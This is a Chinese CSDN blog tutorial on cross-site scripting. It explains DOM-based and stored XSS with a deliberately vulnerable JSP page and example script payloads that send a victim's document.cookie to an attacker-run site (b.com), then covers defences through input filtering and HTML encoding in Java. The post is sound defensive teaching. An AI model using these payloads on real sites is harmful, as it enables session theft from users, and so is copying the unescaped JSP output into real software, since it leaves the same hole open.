XSS攻击及防御

最新推荐文章于 2024-03-19 09:16:17 发布
最新推荐文章于 2024-03-19 09:16:17 发布
阅读量10w+ 收藏 389
点赞数 113
分类专栏: # Java Web 文章标签: XSS 跨站攻击 脚本攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ghsau/article/details/17027893
版权

       本文来自:高爽|Coder,原文地址:http://blog.csdn.net/ghsau/article/details/17027893,转载请注明。
       XSS又称CSS,全称Cross SiteScript,跨站脚本攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当其它用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。如,盗取用户Cookie、破坏页面结构、重定向到其它网站等。

XSS攻击

       XSS攻击类似于SQL注入攻击,攻击之前,我们先找到一个存在XSS漏洞的网站,XSS漏洞分为两种,一种是DOM Based XSS漏洞,另一种是Stored XSS漏洞。理论上,所有可输入的地方没有对输入数据进行处理的话,都会存在XSS漏洞,漏洞的危害取决于攻击代码的威力,攻击代码也不局限于script。

DOM Based XSS

       DOM Based XSS是一种基于网页DOM结构的攻击,该攻击特点是中招的人是少数人。

       场景一

       当我登录a.com后,我发现它的页面某些内容是根据url中的一个叫content参数直接显示的,猜测它测页面处理可能是这样,其它语言类似: 

<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>

<!DOCTYPEhtmlPUBLIC"-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd">

<html>

    <head>

       <title>XSS测试</title>

    </head>

    <body>

       页面内容:<%=request.getParameter("content")%>

    </body>

</html>

      我知道了Tom也注册了该网站,并且知道了他的邮箱(或者其它能接收信息的联系方式),我做一个超链接发给他,超链接地址为:http://www.a.com?content=<script>window.open(“www.b.com?param=”+document.cookie)</script>,当Tom点击这个链接的时候(假设他已经登录a.com),浏览器就会直接打开b.com,并且把Tom在a.com中的cookie信息发送到b.com,b.com是我搭建的网站,当我的网站接收到该信息时,我就盗取了Tom在a.com的cookie信息,cookie信息中可能存有登录密码,攻击成功!这个过程中,受害者只有Tom自己。那当我在浏览器输入a.com?content=<script>alert(“xss”)</script>,浏览器展示页面内容的过程中,就会执行我的脚本,页面输出xss字样,这是攻击了我自己,那我如何攻击别人并且获利呢?

Stored XSS

       Stored XSS是存储式XSS漏洞,由于其攻击代码已经存储到服务器上或者数据库中,所以受害者是很多人。

       场景二

       a.com可以发文章,我登录后在a.com中发布了一篇文章,文章中包含了恶意代码,<script>window.open(“www.b.com?param=”+document.cookie)</script>,保存文章。这时Tom和Jack看到了我发布的文章,当在查看我的文章时就都中招了,他们的cookie信息都发送到了我的服务器上,攻击成功!这个过程中,受害者是多个人。
       Stored XSS漏洞危害性更大,危害面更广。

XSS防御

       我们是在一个矛盾的世界中,有矛就有盾。只要我们的代码中不存在漏洞,攻击者就无从下手,我们要做一个没有缝的蛋。XSS防御有如下方式。

完善的过滤体系

       永远不相信用户的输入。需要对用户的输入进行处理,只允许输入合法的值,其它值一概过滤掉。

Html encode

       假如某些情况下,我们不能对用户数据进行严格的过滤,那我们也需要对标签进行转换。

less-than character (<)

&lt;

greater-than character (>)

&gt;

ampersand character (&)

&amp;

double-quote character (")

&quot;

space character( )

&nbsp;

Any ASCII code character whose code is greater-than or equal to 0x80

&#<number>, where <number> is the ASCII character value.

      比如用户输入:<script>window.location.href=”http://www.baidu.com”;</script>,保存后最终存储的会是:&lt;script&gt;window.location.href=&quot;http://www.baidu.com&quot;&lt;/script&gt;在展现时浏览器会对这些字符转换成文本内容显示,而不是一段可执行的代码。

其它

       下面提供两种Html encode的方法。

  • 使用Apache的commons-lang.jar

    StringEscapeUtils.escapeHtml(str);// 汉字会转换成对应的ASCII码,空格不转换

  • 自己实现转换,只转换部分字符

    private static String htmlEncode(char c) {

        switch(c) {

           case '&':

               return "&amp;";

           case '<':

               return "&lt;";

           case '>':

               return "&gt;";

           case '"':

               return "&quot;";

           case ' ':

               return "&nbsp;";

           default:

               return c + "";

        }

    }

     

    /** 对传入的字符串str进行Html encode转换 */

    public static String htmlEncode(String str) {

        if (str ==null || str.trim().equals(""))   return str;

        StringBuilder encodeStrBuilder = new StringBuilder();

        for (int i = 0, len = str.length(); i < len; i++) {

           encodeStrBuilder.append(htmlEncode(str.charAt(i)));

        }

        return encodeStrBuilder.toString();

    }

       (完) 

       本文来自:高爽|Coder,原文地址:http://blog.csdn.net/ghsau/article/details/17027893,转载请注明。

寻道的 Programmer
关注
  • 113
    点赞
  • 389
    收藏
    觉得还不错? 一键收藏
  • 105
    评论
专栏目录
奇安信安全扫描漏洞解决路径遍历和存储型xss和反射xss攻击漏洞
11-09
亲测可用,中级漏洞,解决服务器段请求伪造 final String forURL = ESAPI.encoder().encodeForURL(url); restTemplate.exchange(forURL, HttpMethod.GET,new HttpEntity<String>(headers), List.class, params);
防范 XSS 攻击的措施
程序猿徐师兄的博客
07-13 2103
XSS 攻击是一种跨站脚本攻击攻击者通过在 Web 页面中注入 JavaScript 代码,从而利用用户浏览器的漏洞执行恶意操作。攻击者可以通过各种方式注入恶意脚本,包括通过表单、URL 参数、cookie 和 HTTP 头等。攻击者可以通过 XSS 攻击窃取用户的敏感信息,如用户名、密码、银行账户等,或者执行恶意操作,如重定向用户到一个恶意网站、发送恶意邮件等。XSS 攻击是一种常见的网络安全漏洞,攻击者通过注入恶意脚本攻击用户的计算机和浏览器。
XSS漏洞简介、危害与分类及验证
jennycisp的博客
06-27 5419
定义/原理:跨站脚本(Cross-Site Scripting),本应该缩写为CSS,但是该缩写已被层叠样式脚本Cascading Style Sheets所用,所以改简称为XSS。也称跨站脚本跨站脚本攻击跨站脚本攻击XSS通过将恶意得Script代码注入到Web页面中,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。本质:是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。特点:XSS主要基于JavaScript。
如何防御XSS攻击
最新发布
Alone_Endeavor的博客
03-19 582
如何防御XSS攻击
XSS漏洞注入,分类,防御方法
Y22Lee的博客
04-06 2570
XSS全称(Cross Site Scripting)跨站脚本攻击,是最常见的Web应用程序安全漏洞之一,仅次于SQL注入。XSS是指攻击者在网页中嵌入客户端脚本,通常是JavaScript编写的危险代码,当用户使用浏览器浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的。由此可知,XSS属于客户端攻击,受害者最终是用户,但特别要注意的是网站管理人员也属于用户之一。
跨站脚本攻击漏洞(XSS):基础知识和防御策略
weixin_43263566的博客
01-16 7325
跨站脚本攻击漏洞-基础篇
网络安全-跨站脚本攻击(XSS)的原理、攻击防御
关注网络安全、云原生安全
08-01 4万+
所用工具 Google出品:开源Web App漏洞测试环境:Firing Range 简介 跨站脚本攻击(全称Cross Site Scripting,为和CSS(层叠样式表)区分,简称为XSS)是指恶意攻击者在Web页面中插入恶意Script代码,当用户浏览网页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss攻击客户端,最终受害者是用户,网站管理员也是用户之一。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过.
XSS防御
weixin_40270125的博客
04-27 1万+
XSS防御是复杂的。流行的浏览器都内置了一些对抗XSS的措施,比如Firefox的CSP,Noscript扩展,IE8内置的XSS Filter等。而对于网站来说,也应该寻找优秀的解决方案,保护用户不被XSS攻击。 1)HttpOnly HttpOnly最早是由微软提出,并在IE 6中实现的,至今已成为一个标准。浏览器将禁止页面的JavaScript访问带有HttpOnly属性的Coo...
【转】XSS的两种攻击方式及五种防御方式
tpriwwq的专栏
11-05 1877
XSS攻击介绍及防御方法
XSS攻击防御(简单易懂)
liu_chenglong的博客
11-10 6888
翻译过来就是跨站脚本。指的是在用户浏览器上,在渲染DOM树的时候,执行了不可预期的JS脚本,从而发生了安全问题。XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。
前端安全系列(一):如何防止XSS攻击
thlzjfefe的博客
10-13 407
前端安全 随着互联网的高速发展,信息安全问题已经成为企业最为关注的焦点之一,而前端又是引发企业安全问题的高危据点。在移动互联网时代,前端人员除了传统的 XSS、CSRF 等安全问题之外,又时常遭遇网络劫持、非法调用 Hybrid API 等新型安全问题。当然,浏览器自身也在不断在进化和发展,不断引入 CSP、Same-Site Cookies 等新技术来增强安全性,但是仍存在很多潜在的威胁,这需...
web安全之XSS攻击防御pdf
08-25
web安全之XSS攻击防御,
Web安全之XSS攻击防御小结
02-23
攻击者对含有漏洞的服务器发起XSS攻击(注入JS代码)。诱使受害者打开受到攻击的服务器URL。受害者在Web浏览器中打开URL,恶意脚本执行。(1)反射型:发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,...
.net core xss攻击防御的方法
10-18
主要介绍了.net core xss攻击防御的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
8、XSS 攻击防御pdf资料
10-15
8、XSS 攻击防御
xss防御之php利用httponly防xss攻击
10-26
主要介绍了xss防御之php利用httponly防xss攻击,下面是PHP设置HttpOnly的方法,需要的朋友可以参考下
Java创建WebService服务及客户端实现
热门推荐
寻道
10-14 10万+
简介 WebService是一种服务的提供方式,通过WebService,不同应用间相互间调用变的很方便,网络上有很多常用的WebService服务,如:http://developer.51cto.com/art/200908/147125.htm,不同的语言平台对WebService都有实现,Java的WebService实现,比较流行的有Axis2、Jaxws,...
完全跨域的单点登录
寻道
03-05 8万+
本文来自:高爽|Coder,原文地址:http://blog.csdn.net/ghsau/article/details/20545513,转载请注明。 完全跨域的单点登录实现方案基本和上篇文章介绍的一样,只不过生成ticket的过程更复杂些。上篇文章中的项目是不能完全跨域的,由于多个应用系统以及认证系统域不同,也没有共同的父域,导致登录后,认证系统向浏览器写的tic...
pdf xss攻击 如何防御
07-27
PDF XSS攻击是指通过在PDF文档中插入恶意代码来攻击用户的浏览器。为了防御这种攻击,以下是一些常见的防御措施: 1. 在处理用户上传的PDF文件时,使用安全的解析器和过滤器来检查和清理文档中的恶意代码或脚本。这可以防止恶意代码的执行。 2. 对于用户上传的PDF文件,可以对其进行彻底的验证和过滤,只允许特定的文件格式和内容类型。可以使用文件类型验证、MIME类型验证等来确保只有合法且安全的PDF文件被接受。 3. 定期更新和维护使用的PDF阅读器和浏览器插件,以确保其具有最新的安全补丁和漏洞修复。这有助于减少攻击者利用已知漏洞进行攻击的可能性。 4. 使用沙盒技术来限制PDF文件在浏览器中执行的权限。沙盒环境可以隔离PDF文件的执行,防止其对用户的浏览器环境产生负面影响。 5. 教育用户有关PDF文件安全性的重要性,并提醒他们避免打开来自不信任或未知来源的PDF文件。用户应该时刻保持警惕,避免点击可疑的链接或下载未经验证的PDF文件。 总而言之,通过使用安全的解析器和过滤器、验证和过滤上传的PDF文件、更新软件补丁、使用沙盒技术以及提高用户意识和警惕性,可以有效地防御PDF XSS攻击

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 105
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值